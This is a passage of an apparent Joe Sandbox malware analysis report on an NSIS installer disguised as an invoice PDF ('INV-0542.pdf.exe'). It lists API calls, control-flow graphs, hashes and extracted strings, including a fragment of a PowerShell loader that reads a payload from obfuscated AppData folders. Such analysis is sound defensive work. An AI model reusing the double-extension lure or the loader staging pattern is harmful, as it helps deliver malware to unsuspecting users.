                                                                                                                                                                  • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                                                                                                                                Strings
                                                                                                                                                                • "C:\Users\user\Desktop\INV-0542.pdf.exe", xrefs: 004030A8
                                                                                                                                                                • Error launching installer, xrefs: 004030F2
                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                                                                                                                                • Null, xrefs: 00403199
                                                                                                                                                                • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                                                                                                                                                • soft, xrefs: 00403190
                                                                                                                                                                • Inst, xrefs: 00403187
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\INV-0542.pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                • API String ID: 2803837635-1806737068
                                                                                                                                                                • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                                                                • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                                                                                                                • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                                                                • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 450 40657e-406587 451 406589-406598 450->451 452 40659a-4065b4 450->452 451->452 453 4067c4-4067ca 452->453 454 4065ba-4065c6 452->454 455 4067d0-4067dd 453->455 456 4065d8-4065e5 453->456 454->453 457 4065cc-4065d3 454->457 459 4067e9-4067ec 455->459 460 4067df-4067e4 call 406541 455->460 456->455 458 4065eb-4065f4 456->458 457->453 461 4067b1 458->461 462 4065fa-40663d 458->462 460->459 464 4067b3-4067bd 461->464 465 4067bf-4067c2 461->465 466 406643-40664f 462->466 467 406755-406759 462->467 464->453 465->453 468 406651 466->468 469 406659-40665b 466->469 470 40675b-406762 467->470 471 40678d-406791 467->471 468->469 474 406695-406698 469->474 475 40665d-406683 call 40640f 469->475 472 406772-40677e call 406541 470->472 473 406764-406770 call 406488 470->473 476 4067a1-4067af lstrlenW 471->476 477 406793-40679c call 40657e 471->477 486 406783-406789 472->486 473->486 481 40669a-4066a6 GetSystemDirectoryW 474->481 482 4066ab-4066ae 474->482 491 406689-406690 call 40657e 475->491 492 40673d-406740 475->492 476->453 477->476 487 406738-40673b 481->487 488 4066c0-4066c4 482->488 489 4066b0-4066bc GetWindowsDirectoryW 482->489 486->476 493 40678b 486->493 487->492 494 40674d-406753 call 4067ef 487->494 488->487 490 4066c6-4066e4 488->490 489->488 496 4066e6-4066ec 490->496 497 4066f8-406710 call 406935 490->497 491->487 492->494 499 406742-406748 lstrcatW 492->499 493->494 494->476 503 4066f4-4066f6 496->503 507 406712-406725 SHGetPathFromIDListW CoTaskMemFree 497->507 508 406727-406730 497->508 499->494 503->497 505 406732-406736 503->505 505->487 507->505 507->508 508->490 508->505
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                                                                                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                                                                                                                                • lstrlenW.KERNEL32(: Completed,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                • String ID: "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$matrices
                                                                                                                                                                • API String ID: 4024019347-412969389
                                                                                                                                                                • Opcode ID: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
                                                                                                                                                                • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                                                                                                                • Opcode Fuzzy Hash: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
                                                                                                                                                                • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 573 401794-4017b9 call 402dcb call 405e87 578 4017c3-4017d5 call 406541 call 405e10 lstrcatW 573->578 579 4017bb-4017c1 call 406541 573->579 585 4017da-4017db call 4067ef 578->585 579->585 588 4017e0-4017e4 585->588 589 4017e6-4017f0 call 40689e 588->589 590 401817-40181a 588->590 598 401802-401814 589->598 599 4017f2-401800 CompareFileTime 589->599 592 401822-40183e call 406031 590->592 593 40181c-40181d call 40600c 590->593 600 401840-401843 592->600 601 4018b2-4018db call 4055c6 call 4032d9 592->601 593->592 598->590 599->598 602 401894-40189e call 4055c6 600->602 603 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 600->603 615 4018e3-4018ef SetFileTime 601->615 616 4018dd-4018e1 601->616 613 4018a7-4018ad 602->613 603->588 636 401889-40188a 603->636 617 402c58 613->617 619 4018f5-401900 CloseHandle 615->619 616->615 616->619 621 402c5a-402c5e 617->621 622 401906-401909 619->622 623 402c4f-402c52 619->623 625 40190b-40191c call 40657e lstrcatW 622->625 626 40191e-401921 call 40657e 622->626 623->617 631 401926-4023c7 call 405ba1 625->631 626->631 631->621 639 402953-40295a 631->639 636->613 638 40188c-40188d 636->638 638->602 639->623
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,?,?,00000031), ref: 004017D5
                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,%Konstituerende176%\presatisfaction,%Konstituerende176%\presatisfaction,00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,?,?,00000031), ref: 004017FA
                                                                                                                                                                  • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                                                                                                                  • Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                                                                                                                  • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                                                                                                                  • Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
                                                                                                                                                                  • Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
                                                                                                                                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                                                                                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                                                                                                                  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                • String ID: %Konstituerende176%\presatisfaction$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$eksegeternes$lftninger\slangetmmerens
                                                                                                                                                                • API String ID: 1941528284-4243214563
                                                                                                                                                                • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                                                                                                                • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                                                                                                                • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                                                                                                                • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 640 4055c6-4055db 641 4055e1-4055f2 640->641 642 405692-405696 640->642 643 4055f4-4055f8 call 40657e 641->643 644 4055fd-405609 lstrlenW 641->644 643->644 646 405626-40562a 644->646 647 40560b-40561b lstrlenW 644->647 649 405639-40563d 646->649 650 40562c-405633 SetWindowTextW 646->650 647->642 648 40561d-405621 lstrcatW 647->648 648->646 651 405683-405685 649->651 652 40563f-405681 SendMessageW * 3 649->652 650->649 651->642 653 405687-40568a 651->653 652->651 653->642
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                                                                                                                • lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                                                                                                                • lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
                                                                                                                                                                • SetWindowTextW.USER32(matrices,matrices), ref: 00405633
                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                • String ID: matrices
                                                                                                                                                                • API String ID: 2531174081-3449136062
                                                                                                                                                                • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                                                                • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                                                                                                                • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                                                                • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 654 4032d9-4032f0 655 4032f2 654->655 656 4032f9-403301 654->656 655->656 657 403303 656->657 658 403308-40330d 656->658 657->658 659 40331d-40332a call 4034be 658->659 660 40330f-403318 call 4034d4 658->660 664 403330-403334 659->664 665 403475 659->665 660->659 666 40333a-40335a GetTickCount call 406a90 664->666 667 40345e-403460 664->667 668 403477-403478 665->668 678 4034b4 666->678 680 403360-403368 666->680 669 403462-403465 667->669 670 4034a9-4034ad 667->670 672 4034b7-4034bb 668->672 673 403467 669->673 674 40346a-403473 call 4034be 669->674 675 40347a-403480 670->675 676 4034af 670->676 673->674 674->665 687 4034b1 674->687 681 403482 675->681 682 403485-403493 call 4034be 675->682 676->678 678->672 684 40336a 680->684 685 40336d-40337b call 4034be 680->685 681->682 682->665 691 403495-4034a1 call 4060e3 682->691 684->685 685->665 692 403381-40338a 685->692 687->678 696 4034a3-4034a6 691->696 697 40345a-40345c 691->697 695 403390-4033ad call 406ab0 692->695 700 4033b3-4033ca GetTickCount 695->700 701 403456-403458 695->701 696->670 697->668 702 403415-403417 700->702 703 4033cc-4033d4 700->703 701->668 706 403419-40341d 702->706 707 40344a-40344e 702->707 704 4033d6-4033da 703->704 705 4033dc-40340d MulDiv wsprintfW call 4055c6 703->705 704->702 704->705 712 403412 705->712 709 403432-403438 706->709 710 40341f-403424 call 4060e3 706->710 707->680 711 403454 707->711 714 40343e-403442 709->714 715 403429-40342b 710->715 711->678 712->702 714->695 716 403448 714->716 715->697 717 40342d-403430 715->717 716->678 717->714
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                                • API String ID: 551687249-2449383134
                                                                                                                                                                • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                                                                                                                • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                                                                                                                • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                                                                                                                • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 718 4068c5-4068e5 GetSystemDirectoryW 719 4068e7 718->719 720 4068e9-4068eb 718->720 719->720 721 4068fc-4068fe 720->721 722 4068ed-4068f6 720->722 724 4068ff-406932 wsprintfW LoadLibraryExW 721->724 722->721 723 4068f8-4068fa 722->723 723->724
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                                                                                                                • wsprintfW.USER32 ref: 00406917
                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                • API String ID: 2200240437-1106614640
                                                                                                                                                                • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                                                                                                                • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 725 4024af-4024e0 call 402dcb * 2 call 402e5b 732 4024e6-4024f0 725->732 733 402c4f-402c5e 725->733 734 4024f2-4024ff call 402dcb lstrlenW 732->734 735 402503-402506 732->735 734->735 739 402508-402519 call 402da9 735->739 740 40251a-40251d 735->740 739->740 741 40252e-402542 RegSetValueExW 740->741 742 40251f-402529 call 4032d9 740->742 746 402544 741->746 747 402547-402628 RegCloseKey 741->747 742->741 746->747 747->733 750 402953-40295a 747->750 750->733
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(lftninger\slangetmmerens,00000023,00000011,00000002), ref: 004024FA
                                                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 0040253A
                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                • String ID: lftninger\slangetmmerens
                                                                                                                                                                • API String ID: 2655323295-458217052
                                                                                                                                                                • Opcode ID: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
                                                                                                                                                                • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                                                                                                                                                • Opcode Fuzzy Hash: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
                                                                                                                                                                • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 751 406060-40606c 752 40606d-4060a1 GetTickCount GetTempFileNameW 751->752 753 4060b0-4060b2 752->753 754 4060a3-4060a5 752->754 756 4060aa-4060ad 753->756 754->752 755 4060a7 754->755 755->756
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040607E
                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                • API String ID: 1716503409-44229769
                                                                                                                                                                • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
